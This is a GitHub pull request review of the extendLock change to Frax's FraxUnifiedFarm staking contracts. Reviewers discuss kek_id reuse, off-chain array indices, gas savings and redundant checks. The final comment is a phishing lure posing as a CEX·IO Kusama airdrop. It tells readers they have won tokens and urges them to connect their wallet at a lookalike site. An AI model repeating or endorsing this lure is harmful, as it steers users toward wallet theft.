### PR TITLE
extendLock

### PR DESCRIPTION
**Pull request by frontier159**

### CODE REVIEW

**Comment by mountainpath9** [comment]
General comment - this includes both efficiency improvements and new behavior. It would make the ultimate approvers job easier if these were separate PRs, so that the new desired behaviour is clear and a minimal change.

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 1]
```diff
@@ -316,6 +395,43 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
+
+        // The start_timestamp is not currently used in weight calcs. Leaving as original lock start.
+        uint256 newStartTimestamp = thisStake.start_timestamp;
+        uint256 newEndingTimestamp = thisStake.ending_timestamp + secs;
+        uint256 newLockDurationSecs = newEndingTimestamp - newStartTimestamp;
+        require(newLockDurationSecs >= lock_time_min, "Minimum stake time not met");
+        require(newLockDurationSecs <= lock_time_for_max_multiplier, "Trying to lock for too long");
+
+        // Updated kek_id
+        bytes32 new_kek_id = keccak256(abi.encodePacked(msg.sender, thisStake.start_timestamp, thisStake.liquidity, _locked_liquidity[msg.sender]));
```
Comment (mountainpath9) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: Is it actually required that we produce a new kek_id rather than reuse the old one?

As best I can see the kek_id is really used as a proxy for a UUID, and I can't see any reason why we can't reuse the old one. Hence extending the lock wouldn't required storing a new id on the part of the caller.

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 2]
```diff
@@ -372,25 +488,41 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
     function withdrawLocked(bytes32 kek_id, address destination_address) nonReentrant external returns (uint256) {
         require(withdrawalsPaused == false, "Withdrawals paused");
-        return _withdrawLocked(msg.sender, destination_address, kek_id);
+
+        // Backwards compat - lookup the index of the stake item first.
+        uint256 arr_idx = getLockedStakeArrIndex(msg.sender, kek_id);
+        return _withdrawLocked(msg.sender, destination_address, kek_id, arr_idx);
+    }
+
+    // Overloaded to take the arr_idx such that it can be computed off-chain.
```
Comment (mountainpath9) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol:497]: Is computing the index off chain reasonable?

Is it not that the case that the array index calculated may become out of date before it is used in which case _getState () will fail with "Stake not found" ?

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol (hunk 1 above)
Comment (frontier159) [reply src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: True, I agree thanks.

Will leave as a question for FRAX team in case they care about its consistency for some reason

**Comment by frontier159** [comment]
> General comment - this includes both efficiency improvements and new behavior. It would make the ultimate approvers job easier if these were separate PRs, so that the new desired behaviour is clear and a minimal change.

@mountainpath9 Perhaps, but given these combined changes aren't too complex I think we want the FRAX team to look at it all as one.

Operationally, we may be calling `stakeLocked()` many times for the same account, so (according to @butlerji) that `lockedStakes[account]` array could get large enough to cause painful gas issues over time (eg 100 items)

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol (hunk 2 above)
Comment (frontier159) [reply src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol:497]: Yes it could given we're now `pop()`'ing the item out of the array (leaving as a delete wouldn't change the arr_idx)

It was my concern too, but according to @butlerji it's ok to make it a concern of the client to handle correctly.

That's one of the reasons I left the old version too which only takes the kek_id...again up to FRAX to comment operationally I think.

Comment (mountainpath9) [reply src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol:497]: > make it a concern of the client to handle correctly.

@butlerji  I don't see how this would work. Would the client specifically detect the "Stake not found" error, and then know this is a reason to retry?

Comment (frontier159) [reply src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol:497]: I think the flow would be pretty synchronous and single-threaded for a given address. 

So first start with: `myLockedStakes = contract.lockedStakesOf(myAddress)`

Then if the client calls `withdrawLocked()` then its local array should change too for any subsequent calls (or just call `contract.lockedStakesOf(myAddress)` again)

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 3]
```diff
@@ -269,22 +269,101 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
-    function _getStake(address staker_address, bytes32 kek_id) internal view returns (LockedStake memory locked_stake, uint256 arr_idx) {
+    // Provided as a helper for clients for kek_id => arr_idx, 
+    // and for backwards compat functions which take kek_id only.
+    function getLockedStakeArrIndex(address staker_address, bytes32 kek_id) public view returns (uint256) {
         for (uint256 i = 0; i < lockedStakes[staker_address].length; i++){ 
             if (kek_id == lockedStakes[staker_address][i].kek_id){
-                locked_stake = lockedStakes[staker_address][i];
-                arr_idx = i;
-                break;
+                require(lockedStakes[staker_address][i].kek_id == kek_id, "Stake not found");
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: this check is redundant

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 4]
```diff
@@ -316,6 +395,43 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
+    function extendLock(bytes32 kek_id, uint256 arr_idx, uint256 secs) updateRewardAndBalance(msg.sender, true) public returns (bytes32) {
+        require(stakingPaused == false || valid_migrators[msg.sender] == true, "Staking paused or in migration");
+
+        // Get the stake
+        LockedStake memory thisStake = _getStake(msg.sender, kek_id, arr_idx);
+
+        // The start_timestamp is not currently used in weight calcs. Leaving as original lock start.
+        uint256 newStartTimestamp = thisStake.start_timestamp;
+        uint256 newEndingTimestamp = thisStake.ending_timestamp + secs;
+        uint256 newLockDurationSecs = newEndingTimestamp - newStartTimestamp;
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: `unchecked` to save on internal ops

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 5]
```diff
@@ -316,6 +395,43 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
         _updateRewardAndBalance(msg.sender, false);
     }
 
+    // Extend the lock period on an existing stake by secs
+    function extendLock(bytes32 kek_id, uint256 arr_idx, uint256 secs) updateRewardAndBalance(msg.sender, true) public returns (bytes32) {
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: make external

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 6]
```diff
@@ -316,6 +395,43 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
+        require(stakingPaused == false || valid_migrators[msg.sender] == true, "Staking paused or in migration");
+
+        // Get the stake
+        LockedStake memory thisStake = _getStake(msg.sender, kek_id, arr_idx);
+
+        // The start_timestamp is not currently used in weight calcs. Leaving as original lock start.
+        uint256 newStartTimestamp = thisStake.start_timestamp;
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: no need for a new variable. you can easily use `thisStake.start_timestamp`

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 7]
```diff
@@ -316,6 +395,43 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
+        uint256 newEndingTimestamp = thisStake.ending_timestamp + secs;
+        uint256 newLockDurationSecs = newEndingTimestamp - newStartTimestamp;
+        require(newLockDurationSecs >= lock_time_min, "Minimum stake time not met");
+        require(newLockDurationSecs <= lock_time_for_max_multiplier, "Trying to lock for too long");
+
+        // Question: Are we ok to use the original kek_id, or should it be creating a new one?
+        //bytes32 new_kek_id = keccak256(abi.encodePacked(msg.sender, newStartTimestamp, thisStake.liquidity, _locked_liquidity[msg.sender]));
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: should be fine using the og kek_id, so far as i can tell.

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 8]
```diff
@@ -372,25 +488,41 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
         // Get the stake and its index
-        (LockedStake memory thisStake, uint256 theArrayIndex) = _getStake(staker_address, kek_id);
+        LockedStake memory thisStake = _getStake(staker_address, kek_id, arr_idx);
         require(block.timestamp >= thisStake.ending_timestamp || stakesUnlocked == true || valid_migrators[msg.sender] == true, "Stake is still locked!");
         uint256 liquidity = thisStake.liquidity;
 
         if (liquidity > 0) {
+            // Should also add a check that _total_liquidity_locked|_locked_liquidity doesn't go negative?
+            // Perhaps overkill if no other bugs.
+            require(_total_liquidity_locked - liquidity > 0, "Withdrawing more liquidity than locked");
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: this is an overkill. moreover if am the only locker in the lp gauge, i wouldn't be able to unlock all my tokens (only liquidity - 1). should rather be `_total_liquidity_locked - liquidity >= 0`.
but from solidity `0.8.0`, there are internal checks to ensure safety. hence an internal error will be thrown

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 9]
```diff
@@ -372,25 +488,41 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
+            require(_locked_liquidity[staker_address] - liquidity > 0, "Withdrawing more liquidity than locked");
```
Comment (princetonbishop) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: also an overkill. if `lockAdditional` and `stakeLocked` lock the right amounts, the right liquidity should always be returned.

File: src/hardhat/contracts/Staking/FraxUnifiedFarmTemplate.sol [hunk 10]
```diff
@@ -470,13 +470,11 @@ contract FraxUnifiedFarmTemplate is Owned, ReentrancyGuard {
             // Calculate the earnings
             uint256[] memory earned_arr = earned(account);
 
-            // Update the rewards array
             for (uint256 i = 0; i < earned_arr.length; i++){ 
+                // Update the rewards array
```
Comment (butlerji) [inline src/hardhat/contracts/Staking/FraxUnifiedFarmTemplate.sol:474]: nitpick - on open source projects, I find the min changes you can make (basically make the reviewers job so fucking easy) the quicker you can get stuff landed. As you build up trust/rep you can start moving stuff around a bit more.

With that perspective, when putting this PR up as a draft for travis, I'd add comments calling out that this is just some loop fusion to make things a bit more efficient (possibly required to keep overall size down), and can be reverted if he prefers for simplicity.

Basically, call out explicitly what's nice to have vs the core change that must land :)

**Review by princetonbishop — CHANGES_REQUESTED** [review]
left some comments

File: src/hardhat/contracts/Staking/FraxUnifiedFarmTemplate.sol [hunk 11]
```diff
@@ -611,14 +609,15 @@ contract FraxUnifiedFarmTemplate is Owned, ReentrancyGuard {
         // Sync the gauge weight, if applicable
         sync_gauge_weights(false);
 
-        // Update the fraxPerLPStored
-        fraxPerLPStored = fraxPerLPToken();
```
Comment (butlerji) [inline src/hardhat/contracts/Staking/FraxUnifiedFarmTemplate.sol:615]: Again, not super obvious this code change is simply algebra moving terms around vs changing the actual implementation of something.

If just algebra, when sharing with Travis, post what you think this achieves/why it's worth the risk of change

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol [hunk 12]
```diff
@@ -269,22 +269,101 @@ contract FraxUnifiedFarm_ERC20 is FraxUnifiedFarmTemplate {
...
+    // In original form, it actually iterated over lockedStakes 3x times.
+    //   1. In the updateRewardAndBalance modifier (which calls calcCurCombinedWeight)
+    //   2. Within _getStake (now moved to be outside, in getLockedStakeArrIndex())
+    //   3. _updateRewardAndBalance is called again.
+    // So if lockedStakes is a large array then it would be gassy.
+    //
+    //
+    // For discussion: Do we need to keep this older version (on-chain arr_idx lookup)?
+    //                 Is overload ok, or better to have a v2?
+    function lockAdditional(bytes32 kek_id, uint256 addl_liq) public {
```
Comment (butlerji) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol:302]: For what we are after - we only care about refreshing locks (as we'll never have more than a single active lock).

Do we leave this out w.r.t optimising getting our refreshing changes in (maybe similar to the above - keep calling out this is a nice to have)

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol (hunk 5 above)
Comment (butlerji) [inline src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: IMHO I'd be partial to lockAdditional being overloaded with an `extend secs`

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol (hunk 7 above)
Comment (butlerji) [reply src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol]: prob a question for Travis

File: src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol (hunk 2 above)
Comment (mountainpath9) [reply src/hardhat/contracts/Staking/FraxUnifiedFarm_ERC20.sol:497]: > I think the flow would be pretty synchronous and single-threaded for a given address.

Oh - I misunderstood. I thought the array was being used for all addresses.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

Kusama Exchange


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
